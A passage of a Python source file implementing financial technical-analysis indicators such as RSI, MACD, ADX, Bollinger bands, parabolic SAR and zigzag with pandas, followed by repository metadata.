pd.Series((df['close'] - df['low']) / (df['high'] - df['low']), name = 'SO%k')\n return SOk\n\n#Stochastic oscillator %D\ndef STO(df, n):\n SOk = pd.Series((df['close'] - df['low']) / (df['high'] - df['low']), name = 'SO%k')\n SOd = pd.Series(SOk.ewm(span = n, min_periods = int(n - 1)).mean(), name = 'SO%d_' + str(n))\n return SOd\n\n#Trix\ndef TRIX(df, n):\n EX1 = df['close'].ewm(span = n, min_periods = int(n - 1)).mean()\n EX2 = EX1.ewm(span = n, min_periods = int(n - 1)).mean()\n EX3 = EX2.ewm(span = n, min_periods = int(n - 1)).mean()\n i = 0\n ROC_l = [0]\n while i + 1 <= df.index[-1]:\n ROC = (EX3[i + 1] - EX3[i]) / EX3[i]\n ROC_l.append(ROC)\n i = i + 1\n Trix = pd.Series(ROC_l, name = 'Trix_' + str(n))\n return Trix\n\n#Average Directional Movement Index\ndef ADX(df, n, n_ADX):\n i = 0\n UpI = []\n DoI = []\n while i + 1 <= df.index[-1]:\n UpMove = df.ix[i + 1, 'high'] - df.ix[i, 'high']\n DoMove = df.ix[i, 'low'] - df.ix[i + 1, 'low']\n if UpMove > DoMove and UpMove > 0:\n UpD = UpMove\n else: UpD = 0\n UpI.append(UpD)\n if DoMove > UpMove and DoMove > 0:\n DoD = DoMove\n else: DoD = 0\n DoI.append(DoD)\n i = i + 1\n i = 0\n TR_l = [0]\n while i < df.index[-1]:\n TR = max(df.ix[i + 1, 'high'], df.ix[i, 'close']) - min(df.ix[i + 1, 'low'], df.ix[i, 'close'])\n TR_l.append(TR)\n i = i + 1\n TR_s = pd.Series(TR_l)\n ATR = pd.Series(TR_s.ewm(span = n, min_periods = int(n)).mean())\n UpI = pd.Series(UpI)\n DoI = pd.Series(DoI)\n PosDI = pd.Series(UpI.ewm(span = n, min_periods = int(n - 1) / ATR).mean())\n NegDI = pd.Series(DoI.ewm(span = n, min_periods = int(n - 1) / ATR).mean())\n ADX = pd.Series((abs(PosDI - NegDI) / (PosDI + NegDI)).ewm(span = 
n_ADX, min_periods = int(n_ADX - 1)).mean(), name = 'ADX_' + str(n) + '_' + str(n_ADX))\n return ADX\n\n#DEMA\ndef DEMA(df, n_fast, n_slow, signal=9):\n EMAfast = pd.Series(df['close'].ewm(span = n_fast, min_periods = int(n_slow - 1)).mean())\n EMAslow = pd.Series(df['close'].ewm(span = n_slow, min_periods = int(n_slow - 1)).mean())\n DEMA = pd.Series(100 * (EMAfast- EMAslow) / ((EMAfast + EMAslow) / 2), name = 'DEMA_' + str(n_fast) + '_' + str(n_slow))\n return DEMA\n\n#MACD, MACD Signal and MACD difference\ndef MACD(df, n_fast, n_slow, signal=9):\n EMAfast = pd.Series(df['close'].ewm(span = n_fast, min_periods = int(n_slow - 1)).mean())\n EMAslow = pd.Series(df['close'].ewm(span = n_slow, min_periods = int(n_slow - 1)).mean())\n MACD = pd.Series(EMAfast - EMAslow, name = 'MACD_' + str(n_fast) + '_' + str(n_slow))\n MACDsign = pd.Series(MACD.ewm(span = signal, min_periods = int(signal)).mean(), name = 'MACDsign_' + str(n_fast) + '_' + str(n_slow))\n MACDdiff = pd.Series(MACD - MACDsign, name = 'MACDdiff_' + str(n_fast) + '_' + str(n_slow))\n return MACD, MACDsign, MACDdiff\n\n#PPO, PPO Signal and PPO difference\ndef PPO(df, n_fast, n_slow, signal=9):\n EMAfast = pd.Series(df['close'].ewm(span = n_fast, min_periods = int(n_slow - 1)).mean())\n EMAslow = pd.Series(df['close'].ewm(span = n_slow, min_periods = int(n_slow - 1)).mean())\n PPO = pd.Series(100 * (EMAfast - EMAslow) / EMAslow, name = 'PPO_' + str(n_fast) + '_' + str(n_slow))\n PPOsign = pd.Series(PPO.ewm(span = signal, min_periods = int(signal)).mean(), name = 'PPOsign_' + str(n_fast) + '_' + str(n_slow))\n PPOdiff = pd.Series(PPO - PPOsign, name = 'PPOdiff_' + str(n_fast) + '_' + str(n_slow))\n return PPO, PPOsign, PPOdiff\n\n#Mass Index\ndef MassI(df):\n Range = df['high'] - df['low']\n EX1 = Range.ewm(span = 9, min_periods = 8).mean()\n EX2 = EX1.ewm(span = 9, min_periods = 8).mean()\n Mass = EX1 / EX2\n MassI = pd.Series(pd.rolling_sum(Mass, 25), name = 'Mass Index')\n return MassI\n\n#Vortex Indicator: http://www.vortexindicator.com/VFX_VORTEX.PDF\ndef Vortex(df, n):\n i = 0\n TR = [0]\n while i < df.index[-1]:\n Range = max(df.ix[i + 1, 'high'], df.ix[i, 'close']) - min(df.ix[i + 1, 'low'], df.ix[i, 'close'])\n TR.append(Range)\n i = i + 1\n i = 0\n VM = [0]\n while i < df.index[-1]:\n Range = abs(df.ix[i + 1, 'high'] - df.ix[i, 'low']) - abs(df.ix[i + 1, 'low'] - df.ix[i, 'high'])\n VM.append(Range)\n i = i + 1\n VI = pd.Series(pd.rolling_sum(pd.Series(VM), n) / pd.rolling_sum(pd.Series(TR), n), name = 'Vortex_' + str(n))\n return VI\n\n\n\n\n\n#KST Oscillator\ndef KST(df, r1, r2, r3, r4, n1, n2, n3, n4):\n M = df['close'].diff(r1 - 1)\n N = df['close'].shift(r1 - 1)\n ROC1 = M / N\n M = df['close'].diff(r2 - 1)\n N = df['close'].shift(r2 - 1)\n ROC2 = M / N\n M = df['close'].diff(r3 - 1)\n N = df['close'].shift(r3 - 1)\n ROC3 = M / N\n M = df['close'].diff(r4 - 1)\n N = df['close'].shift(r4 - 1)\n ROC4 = M / N\n KST = pd.Series(pd.rolling_sum(ROC1, n1) + pd.rolling_sum(ROC2, n2) * 2 + pd.rolling_sum(ROC3, n3) * 3 + pd.rolling_sum(ROC4, n4) * 4, name = 'KST_' + str(r1) + '_' + str(r2) + '_' + str(r3) + '_' + str(r4) + '_' + str(n1) + '_' + str(n2) + '_' + str(n3) + '_' + str(n4))\n return KST\n\n#Relative Strength Index\ndef RSI(df, n):\n UpMove = df['high'].diff(-1)\n DoMove = df['low'].diff(1)\n UpMove[UpMove <= DoMove] = 0\n DoMove[DoMove <= UpMove] = 0\n UpMove[UpMove < 0] = 0\n DoMove[DoMove < 0] = 0\n UpMove = pd.Series(UpMove)\n DoMove = pd.Series(DoMove)\n PosDI = pd.Series(UpMove.ewm(span = n, min_periods = int(n - 
1)).mean())\n NegDI = pd.Series(DoMove.ewm(span = n, min_periods = int(n - 1)).mean())\n RSI = pd.Series(PosDI / (PosDI + NegDI), name = 'RSI_' + str(n))\n return RSI\n\n#Relative Strength Index\ndef RSI_(df, n):\n i = 0\n UpI = [0]\n DoI = [0]\n while i + 1 < df.shape[0]:\n UpMove = df.ix[i + 1, 'high'] - df.ix[i, 'high']\n DoMove = df.ix[i, 'low'] - df.ix[i + 1, 'low']\n if UpMove > DoMove and UpMove > 0:\n UpD = UpMove\n else: UpD = 0\n UpI.append(UpD)\n if DoMove > UpMove and DoMove > 0:\n DoD = DoMove\n else: DoD = 0\n DoI.append(DoD)\n i = i + 1\n UpI = pd.Series(UpI)\n DoI = pd.Series(DoI)\n PosDI = pd.Series(UpI.ewm(span = n, min_periods = int(n - 1)).mean())\n NegDI = pd.Series(DoI.ewm(span = n, min_periods = int(n - 1)).mean())\n RSI = pd.Series(PosDI / (PosDI + NegDI), name = 'RSI_' + str(n))\n return RSI\n\n#Relative Strength Index\ndef _RSI(df, n):\n nint = int(n)\n deltas = df[\"close\"].diff()\n seed = deltas[:nint+1]\n up = seed[seed>=0].sum()/n\n down = -seed[seed<0].sum()/n\n rs = up/down\n rsi = np.zeros((df.shape[0],), dtype=np.float64)\n rsi[:nint] = 100. - 100./(1.+rs)\n\n for i in range(nint, len(deltas)):\n delta = deltas[i-1] # cause the diff is 1 shorter\n\n if delta>0:\n upval = delta\n downval = 0.\n else:\n upval = 0.\n downval = -delta\n\n up = (up*(n-1) + upval)/n\n down = (down*(n-1) + downval)/n\n\n rs = up/down\n rsi[i] = 100. - 100./(1.+rs)\n RSI = pd.Series(rsi, name = 'RSI_' + str(n))\n return RSI\n\n# Stochastic Relative Strength Index\ndef STOCHRSI(df, n):\n start = -int(n)\n if start < 0:\n start = 0\n rsi = RSI(df, n)\n RSIhistory = rsi[start:]\n minRSI = RSIhistory.min()\n maxRSI = RSIhistory.max()\n base = maxRSI - minRSI\n if base == 0:\n base = -minRSI\n STOCHRSI = pd.Series(((rsi - minRSI) / base), name = 'STOCHRSI_' + str(n))\n return STOCHRSI\n\n#True Strength Index\ndef TSI(df, r, s):\n M = pd.Series(df['close'].diff(1))\n aM = abs(M)\n EMA1 = pd.Series(M.ewm(span = r, min_periods = int(r - 1)).mean())\n aEMA1 = pd.Series(aM.ewm(span = r, min_periods = int(r - 1)).mean())\n EMA2 = pd.Series(EMA1.ewm(span = s, min_periods = int(s - 1)).mean())\n aEMA2 = pd.Series(aEMA1.ewm(span = s, min_periods = int(s - 1)).mean())\n TSI = pd.Series(EMA2 / aEMA2, name = 'TSI_' + str(r) + '_' + str(s))\n return TSI\n\n#Accumulation/Distribution\ndef ACCDIST(df, n):\n ad = (2 * df['close'] - df['high'] - df['low']) / (df['high'] - df['low']) * df['volume']\n M = ad.diff(n - 1)\n N = ad.shift(n - 1)\n ROC = M / N\n AD = pd.Series(ROC, name = 'Acc/Dist_ROC_' + str(n))\n return AD\n\n#Chaikin Oscillator\ndef Chaikin(df):\n ad = (2 * df['close'] - df['high'] - df['low']) / (df['high'] - df['low']) * df['volume']\n Chaikin = pd.Series(ad.ewm(span = 3, min_periods = 2).mean() - ad.ewm(span = 10, min_periods = 9).mean(), name = 'Chaikin')\n return Chaikin\n\n#Money Flow Index and Ratio\ndef MFI(df, n):\n PP = (df['high'] + df['low'] + df['close']) / 3\n i = 0\n PosMF = [0]\n while i < df.index[-1]:\n if PP[i + 1] > PP[i]:\n PosMF.append(PP[i + 1] * df.ix[i + 1, 'volume'])\n else:\n PosMF.append(0)\n i = i + 1\n PosMF = pd.Series(PosMF)\n TotMF = PP * df['volume']\n MFR = pd.Series(PosMF / TotMF)\n MFI = pd.Series(pd.rolling_mean(MFR, n), name = 'MFI_' + str(n))\n return MFI\n\n#On-balance Volume\ndef OBV(df, n):\n i = 0\n OBV = [0]\n while i < df.index[-1]:\n if df.ix[i + 1, 'close'] - df.ix[i, 'close'] > 0:\n OBV.append(df.ix[i + 1, 'volume'])\n if df.ix[i + 1, 'close'] - df.ix[i, 'close'] == 0:\n OBV.append(0)\n if df.ix[i + 1, 'close'] - df.ix[i, 'close'] < 0:\n 
OBV.append(-df.ix[i + 1, 'volume'])\n i = i + 1\n OBV = pd.Series(OBV)\n OBV_ma = pd.Series(pd.rolling_mean(OBV, n), name = 'OBV_' + str(n))\n return OBV_ma\n\n#Force Index\ndef FORCE(df, n):\n F = pd.Series(df['close'].diff(n) * df['volume'].diff(n), name = 'Force_' + str(n))\n return F\n\n#Ease of Movement\ndef EOM(df, n):\n EoM = (df['high'].diff(1) + df['low'].diff(1)) * (df['high'] - df['low']) / (2 * df['volume'])\n Eom_ma = pd.Series(pd.rolling_mean(EoM, n), name = 'EoM_' + str(n))\n return Eom_ma\n\n#Commodity Channel Index\ndef CCI(df, n):\n PP = (df['high'] + df['low'] + df['close']) / 3\n CCI = pd.Series((PP - pd.rolling_mean(PP, n)) / pd.rolling_std(PP, n), name = 'CCI_' + str(n))\n return CCI\n\n#Coppock Curve\ndef COPP(df, n):\n M = df['close'].diff(int(n * 11 / 10) - 1)\n N = df['close'].shift(int(n * 11 / 10) - 1)\n ROC1 = M / N\n M = df['close'].diff(int(n * 14 / 10) - 1)\n N = df['close'].shift(int(n * 14 / 10) - 1)\n ROC2 = M / N\n Copp = pd.Series((ROC1 + ROC2).ewm(span = n, min_periods = int(n)).mean(), name = 'Copp_' + str(n))\n return Copp\n\n#Keltner Channel\ndef KELCH(df, n):\n KelChM = pd.Series(pd.rolling_mean((df['high'] + df['low'] + df['close']) / 3, n), name = 'KelChM_' + str(n))\n KelChU = pd.Series(pd.rolling_mean((4 * df['high'] - 2 * df['low'] + df['close']) / 3, n), name = 'KelChU_' + str(n))\n KelChD = pd.Series(pd.rolling_mean((-2 * df['high'] + 4 * df['low'] + df['close']) / 3, n), name = 'KelChD_' + str(n))\n return KelChM, KelChU, KelChD\n\n#Ultimate Oscillator\ndef ULTOSC(df):\n i = 0\n TR_l = [0]\n BP_l = [0]\n while i < df.index[-1]:\n TR = max(df.ix[i + 1, 'high'], df.ix[i, 'close']) - min(df.ix[i + 1, 'low'], df.ix[i, 'close'])\n TR_l.append(TR)\n BP = df.ix[i + 1, 'close'] - min(df.ix[i + 1, 'low'], df.ix[i, 'close'])\n BP_l.append(BP)\n i = i + 1\n UltO = pd.Series((4 * pd.rolling_sum(pd.Series(BP_l), 7) / pd.rolling_sum(pd.Series(TR_l), 7)) + (2 * pd.rolling_sum(pd.Series(BP_l), 14) / pd.rolling_sum(pd.Series(TR_l), 14)) + (pd.rolling_sum(pd.Series(BP_l), 28) / pd.rolling_sum(pd.Series(TR_l), 28)), name = 'Ultimate_Osc')\n return UltO\n\n#Donchian Channel\ndef DONCH(df, n):\n i = 0\n DC_l = []\n while i < n - 1:\n DC_l.append(0)\n i = i + 1\n i = 0\n while i + n - 1 < df.index[-1]:\n DC = max(df['high'].ix[i:i + n - 1]) - min(df['low'].ix[i:i + n - 1])\n DC_l.append(DC)\n i = i + 1\n DonCh = pd.Series(DC_l, name = 'Donchian_' + str(n))\n DonCh = DonCh.shift(n - 1)\n return DonCh\n\n#Standard Deviation\ndef STDDEV(df, n):\n return pd.Series(pd.rolling_std(df['close'], n), name = 'STD_' + str(n))\n\n\n\n\nfrom functools import wraps\n\nfrom pandas import DataFrame, Series\nfrom pandas.stats import moments\n\n\ndef series_indicator(col):\n def inner_series_indicator(f):\n @wraps(f)\n def wrapper(s, *args, **kwargs):\n if isinstance(s, DataFrame):\n s = s[col]\n return f(s, *args, **kwargs)\n return wrapper\n return inner_series_indicator\n\n\ndef _wilder_sum(s, n):\n s = s.dropna()\n\n nf = (n - 1) / n\n ws = [np.nan]*(n - 1) + [s[n - 1] + nf*sum(s[:n - 1])]\n\n for v in s[n:]:\n ws.append(v + ws[-1]*nf)\n\n return Series(ws, index=s.index)\n\n\n@series_indicator('high')\ndef hhv(s, n):\n return moments.rolling_max(s, n)\n\n\n@series_indicator('low')\ndef llv(s, n):\n return moments.rolling_min(s, n)\n\n\n@series_indicator('close')\ndef ema(s, n, wilder=False):\n span = n if not wilder else 2*n - 1\n return moments.ewma(s, span=span)\n\n\n@series_indicator('close')\ndef macd(s, nfast=12, nslow=26, nsig=9, percent=True):\n fast, slow = ema(s, 
nfast), ema(s, nslow)\n\n if percent:\n macd = 100*(fast / slow - 1)\n else:\n macd = fast - slow\n\n sig = ema(macd, nsig)\n hist = macd - sig\n\n return DataFrame(dict(macd=macd, signal=sig, hist=hist,\n fast=fast, slow=slow))\n\n\ndef aroon(s, n=25):\n up = 100 * moments.rolling_apply(s.high, n + 1, lambda x: x.argmax()) / n\n dn = 100 * moments.rolling_apply(s.low, n + 1, lambda x: x.argmin()) / n\n\n return DataFrame(dict(up=up, down=dn))\n\n\n@series_indicator('close')\ndef rsi(s, n=14):\n diff = s.diff()\n which_dn = diff < 0\n\n up, dn = diff, diff*0\n up[which_dn], dn[which_dn] = 0, -up[which_dn]\n\n emaup = ema(up, n, wilder=True)\n emadn = ema(dn, n, wilder=True)\n\n return 100 * emaup/(emaup + emadn)\n\n\ndef stoch(s, nfastk=14, nfullk=3, nfulld=3):\n if not isinstance(s, DataFrame):\n s = DataFrame(dict(high=s, low=s, close=s))\n\n hmax, lmin = hhv(s, nfastk), llv(s, nfastk)\n\n fastk = 100 * (s.close - lmin)/(hmax - lmin)\n fullk = moments.rolling_mean(fastk, nfullk)\n fulld = moments.rolling_mean(fullk, nfulld)\n\n return DataFrame(dict(fastk=fastk, fullk=fullk, fulld=fulld))\n\n\n@series_indicator('close')\ndef dtosc(s, nrsi=13, nfastk=8, nfullk=5, nfulld=3):\n srsi = stoch(rsi(s, nrsi), nfastk, nfullk, nfulld)\n return DataFrame(dict(fast=srsi.fullk, slow=srsi.fulld))\n\n\ndef atr(s, n=14):\n cs = s.close.shift(1)\n tr = s.high.combine(cs, max) - s.low.combine(cs, min)\n\n return ema(tr, n, wilder=True)\n\n\ndef cci(s, n=20, c=0.015):\n if isinstance(s, DataFrame):\n s = s[['high', 'low', 'close']].mean(axis=1)\n\n mavg = moments.rolling_mean(s, n)\n mdev = moments.rolling_apply(s, n, lambda x: np.fabs(x - x.mean()).mean())\n\n return (s - mavg)/(c * mdev)\n\n\ndef cmf(s, n=20):\n clv = (2*s.close - s.high - s.low) / (s.high - s.low)\n vol = s.volume\n\n return moments.rolling_sum(clv*vol, n) / moments.rolling_sum(vol, n)\n\n\ndef force(s, n=2):\n return ema(s.close.diff()*s.volume, n)\n\n\n@series_indicator('close')\ndef kst(s, r1=10, r2=15, r3=20, r4=30, n1=10, n2=10, n3=10, n4=15, nsig=9):\n rocma1 = moments.rolling_mean(s / s.shift(r1) - 1, n1)\n rocma2 = moments.rolling_mean(s / s.shift(r2) - 1, n2)\n rocma3 = moments.rolling_mean(s / s.shift(r3) - 1, n3)\n rocma4 = moments.rolling_mean(s / s.shift(r4) - 1, n4)\n\n kst = 100*(rocma1 + 2*rocma2 + 3*rocma3 + 4*rocma4)\n sig = moments.rolling_mean(kst, nsig)\n\n return DataFrame(dict(kst=kst, signal=sig))\n\n\ndef ichimoku(s, n1=9, n2=26, n3=52):\n conv = (hhv(s, n1) + llv(s, n1)) / 2\n base = (hhv(s, n2) + llv(s, n2)) / 2\n\n spana = (conv + base) / 2\n spanb = (hhv(s, n3) + llv(s, n3)) / 2\n\n return DataFrame(dict(conv=conv, base=base, spana=spana.shift(n2),\n spanb=spanb.shift(n2), lspan=s.close.shift(-n2)))\n\n\ndef ultimate(s, n1=7, n2=14, n3=28):\n cs = s.close.shift(1)\n bp = s.close - s.low.combine(cs, min)\n tr = s.high.combine(cs, max) - s.low.combine(cs, min)\n\n avg1 = moments.rolling_sum(bp, n1) / moments.rolling_sum(tr, n1)\n avg2 = moments.rolling_sum(bp, n2) / moments.rolling_sum(tr, n2)\n avg3 = moments.rolling_sum(bp, n3) / moments.rolling_sum(tr, n3)\n\n return 100*(4*avg1 + 2*avg2 + avg3) / 7\n\n\ndef auto_envelope(s, nema=22, nsmooth=100, ndev=2.7):\n sema = ema(s.close, nema)\n mdiff = s[['high','low']].sub(sema, axis=0).abs().max(axis=1)\n csize = moments.ewmstd(mdiff, nsmooth)*ndev\n\n return DataFrame(dict(ema=sema, lenv=sema - csize, henv=sema + csize))\n\n\n@series_indicator('close')\ndef bbands(s, n=20, ndev=2):\n mavg = moments.rolling_mean(s, n)\n mstd = moments.rolling_std(s, n)\n\n hband 
= mavg + ndev*mstd\n lband = mavg - ndev*mstd\n\n return DataFrame(dict(ma=mavg, lband=lband, hband=hband))\n\n\ndef safezone(s, position, nmean=10, npen=2.0, nagg=3):\n if isinstance(s, DataFrame):\n s = s.low if position == 'long' else s.high\n\n sgn = -1.0 if position == 'long' else 1.0\n\n # Compute the average upside/downside penetration\n pen = moments.rolling_apply(\n sgn*s.diff(), nmean,\n lambda x: x[x > 0].mean() if (x > 0).any() else 0\n )\n\n stop = s + sgn*npen*pen\n return hhv(stop, nagg) if position == 'long' else llv(stop, nagg)\n\n\ndef sar(s, af=0.02, amax=0.2):\n high, low = s.high, s.low\n\n # Starting values\n sig0, xpt0, af0 = True, high[0], af\n sar = [low[0] - (high - low).std()]\n\n for i in xrange(1, len(s)):\n sig1, xpt1, af1 = sig0, xpt0, af0\n\n lmin = min(low[i - 1], low[i])\n lmax = max(high[i - 1], high[i])\n\n if sig1:\n sig0 = low[i] > sar[-1]\n xpt0 = max(lmax, xpt1)\n else:\n sig0 = high[i] >= sar[-1]\n xpt0 = min(lmin, xpt1)\n\n if sig0 == sig1:\n sari = sar[-1] + (xpt1 - sar[-1])*af1\n af0 = min(amax, af1 + af)\n\n if sig0:\n af0 = af0 if xpt0 > xpt1 else af1\n sari = min(sari, lmin)\n else:\n af0 = af0 if xpt0 < xpt1 else af1\n sari = max(sari, lmax)\n else:\n af0 = af\n sari = xpt0\n\n sar.append(sari)\n\n return Series(sar, index=s.index)\n\n\ndef adx(s, n=14):\n cs = s.close.shift(1)\n tr = s.high.combine(cs, max) - s.low.combine(cs, min)\n trs = _wilder_sum(tr, n)\n\n up = s.high - s.high.shift(1)\n dn = s.low.shift(1) - s.low\n\n pos = ((up > dn) & (up > 0)) * up\n neg = ((dn > up) & (dn > 0)) * dn\n\n dip = 100 * _wilder_sum(pos, n) / trs\n din = 100 * _wilder_sum(neg, n) / trs\n\n dx = 100 * np.abs((dip - din)/(dip + din))\n adx = ema(dx, n, wilder=True)\n\n return DataFrame(dict(adx=adx, dip=dip, din=din))\n\n\ndef chandelier(s, position, n=22, npen=3):\n if position == 'long':\n return hhv(s, n) - npen*atr(s, n)\n else:\n return llv(s, n) + npen*atr(s, n)\n\n\ndef vortex(s, n=14):\n ss = s.shift(1)\n\n tr = s.high.combine(ss.close, max) - s.low.combine(ss.close, min)\n trn = moments.rolling_sum(tr, n)\n\n vmp = np.abs(s.high - ss.low)\n vmm = np.abs(s.low - ss.high)\n\n vip = moments.rolling_sum(vmp, n) / trn\n vin = moments.rolling_sum(vmm, n) / trn\n\n return DataFrame(dict(vin=vin, vip=vip))\n\n\n@series_indicator('close')\ndef gmma(s, nshort=[3, 5, 8, 10, 12, 15],\n nlong=[30, 35, 40, 45, 50, 60]):\n short = {str(n): ema(s, n) for n in nshort}\n long = {str(n): ema(s, n) for n in nlong}\n\n return DataFrame(short), DataFrame(long)\n\n\ndef zigzag(s, pct=5):\n ut = 1 + pct / 100\n dt = 1 - pct / 100\n\n ld = s.index[0]\n lp = s.close[ld]\n tr = None\n\n zzd, zzp = [ld], [lp]\n\n for ix, ch, cl in zip(s.index, s.high, s.low):\n # No initial trend\n if tr is None:\n if ch / lp > ut:\n tr = 1\n elif cl / lp < dt:\n tr = -1\n # Trend is up\n elif tr == 1:\n # New high\n if ch > lp:\n ld, lp = ix, ch\n # Reversal\n elif cl / lp < dt:\n zzd.append(ld)\n zzp.append(lp)\n\n tr, ld, lp = -1, ix, cl\n # Trend is down\n else:\n # New low\n if cl < lp:\n ld, lp = ix, cl\n # Reversal\n elif ch / lp > ut:\n zzd.append(ld)\n zzp.append(lp)\n\n tr, ld, lp = 1, ix, ch\n\n # Extrapolate the current trend\n if zzd[-1] != s.index[-1]:\n zzd.append(s.index[-1])\n\n if tr is None:\n zzp.append(s.close[zzd[-1]])\n elif tr == 1:\n zzp.append(s.high[zzd[-1]])\n else:\n zzp.append(s.low[zzd[-1]])\n\n return Series(zzp, index=zzd)\n\n", "repo_name": "mainyaa/bitmech", "sub_path": "bitmech/indicators.py", "file_name": "indicators.py", "file_ext": "py", 
"file_size_in_byte": 22912, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 11, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pandas.Series", "line_number": 11, "usage_type": "call"}, {"api_name": "pandas.rolling_mean", "line_number": 11, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 16, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 21, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 28, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 39, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 40, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 45, "usage_type": "call"}, {"api_name": "pandas.rolling_mean", "line_number": 45, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 46, "usage_type": "call"}, {"api_name": "pandas.rolling_std", "line_number": 46, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 48, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 50, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 55, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 56, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 57, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 58, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 59, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 60, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 61, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 63, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 68, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 73, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 74, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 88, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 114, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 115, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 116, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 117, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 118, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 119, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 120, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 125, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 126, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 127, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 132, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 133, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 134, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 135, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 136, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 141, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 142, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 143, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 144, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 145, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 154, "usage_type": "call"}, {"api_name": "pandas.rolling_sum", "line_number": 154, 
"usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 171, "usage_type": "call"}, {"api_name": "pandas.rolling_sum", "line_number": 171, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 192, "usage_type": "call"}, {"api_name": "pandas.rolling_sum", "line_number": 192, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 203, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 204, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 205, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 206, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 207, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 227, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 228, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 229, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 230, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 231, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 242, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 242, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 260, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 275, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 280, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 282, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 283, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 284, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 285, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 286, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 295, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 301, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 315, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 317, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 318, "usage_type": "call"}, {"api_name": "pandas.rolling_mean", "line_number": 318, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 333, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 334, "usage_type": "call"}, {"api_name": "pandas.rolling_mean", "line_number": 334, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 339, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 345, "usage_type": "call"}, {"api_name": "pandas.rolling_mean", "line_number": 345, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 351, "usage_type": "call"}, {"api_name": "pandas.rolling_mean", "line_number": 351, "usage_type": "call"}, {"api_name": "pandas.rolling_std", "line_number": 351, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 362, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 367, "usage_type": "call"}, {"api_name": "pandas.rolling_mean", "line_number": 367, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 368, "usage_type": "call"}, {"api_name": "pandas.rolling_mean", "line_number": 368, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 369, "usage_type": "call"}, {"api_name": "pandas.rolling_mean", "line_number": 369, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 383, "usage_type": "call"}, {"api_name": "pandas.rolling_sum", 
